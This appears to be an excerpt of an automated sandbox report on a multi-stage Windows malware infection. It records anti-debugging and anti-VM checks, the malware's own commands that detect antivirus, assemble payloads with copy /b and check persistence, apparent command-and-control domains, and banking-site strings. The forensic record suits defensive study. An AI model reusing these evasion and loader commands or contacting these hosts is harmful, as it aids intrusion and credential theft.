                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\36469\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\36469
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1533901037.0000000000A69000.00000040.00000001.01000000.00000006.sdmp, BEB973FPO2R62ZWABVOVP8TC.exe, BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000002.1547870814.0000000000CF2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, skotes.exe, 00000007.00000002.1587693353.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000001.1526550534.0000000000212000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 00000008.00000002.1595406472.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000002.2748456871.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000001.1716865425.0000000000212000.00000080.00000001.01000000.0000000A.sdmp, ktIplF5.exe, 0000000F.00000002.2103984624.0000000000A17000.00000040.00000001.01000000.00000011.sdmp, df1b740bf8.exe, 0000001E.00000002.2059698305.0000000000417000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000003.1520358356.000000000143F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                            Source: ktIplF5.exe, 0000000F.00000002.2108033300.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091707440.00000000011BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
                            Source: AApUa7VQiy.exe, AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1462219530.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1383159698.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1372723744.0000000001458000.00000004.00000020.00020000.00000000.sdmp, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.0000000001083000.00000004.00000020.00020000.00000000.sdmp, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2765037077.0000000001468000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2754377990.00000000007B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                            Source: Avoiding.com, 0000001C.00000002.2769015216.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001001000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NVMware2
                            Source: f46bdbcca4.tmp, 00000020.00000002.2060833534.0000000000597000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000003.1520358356.000000000143F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                            Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1533901037.0000000000A69000.00000040.00000001.01000000.00000006.sdmp, BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000002.1547870814.0000000000CF2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000007.00000002.1587693353.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000001.1526550534.0000000000212000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 00000008.00000002.1595406472.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000002.2748456871.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000001.1716865425.0000000000212000.00000080.00000001.01000000.0000000A.sdmp, ktIplF5.exe, 0000000F.00000002.2103984624.0000000000A17000.00000040.00000001.01000000.00000011.sdmp, df1b740bf8.exe, 0000001E.00000002.2059698305.0000000000417000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                            Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696503903p
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeThread information set: HideFromDebugger
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeThread information set: HideFromDebugger
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeOpen window title or class name: regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeOpen window title or class name: gbdyllo
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeOpen window title or class name: procmon_window_class
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeOpen window title or class name: ollydbg
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeOpen window title or class name: filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeFile opened: NTICE
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeFile opened: SICE
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeFile opened: SIWVID
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_053E0123 rdtsc 6_2_053E0123
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B3652B mov eax, dword ptr fs:[00000030h]6_2_00B3652B
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B3A302 mov eax, dword ptr fs:[00000030h]6_2_00B3A302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_0005A302 mov eax, dword ptr fs:[00000030h]7_2_0005A302
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_0005652B mov eax, dword ptr fs:[00000030h]7_2_0005652B
                            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeMemory protected: page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: Yara matchFile source: Process Memory Space: ES0PERDCSSGNQK1XTMK282189FFMR8.exe PID: 7892, type: MEMORYSTR
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: finickypwk.lat
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: shoefeatthe.lat
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: savorraiykj.lat
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: kickykiduz.lat
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: miniatureyu.lat
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: leggelatez.lat
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: washyceehsu.lat
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: bloodyswif.lat
                            Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: breakfasutwy.cyou
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe "C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe "C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe "C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe "C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E GeographicJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                            Source: Avoiding.com, 0000001C.00000000.1976078719.0000000000493000.00000002.00000001.01000000.00000014.sdmp, Macromedia.com, 00000033.00000003.2233001765.00000000039A1000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000000.2215472486.00000000004D3000.00000002.00000001.01000000.00000020.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1533901037.0000000000A69000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: PVProgram Manager
                            Source: ktIplF5.exe, 0000000F.00000002.2103984624.0000000000A17000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: nProgram Manager
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe, BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000002.1548691623.0000000000D37000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, skotes.exe, 00000007.00000002.1588235987.0000000000257000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Program Manager
                            Source: df1b740bf8.exe, 0000001E.00000002.2059698305.0000000000417000.00000040.00000001.01000000.00000015.sdmpBinary or memory string: \Program Manager
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe VolumeInformationJump to behavior
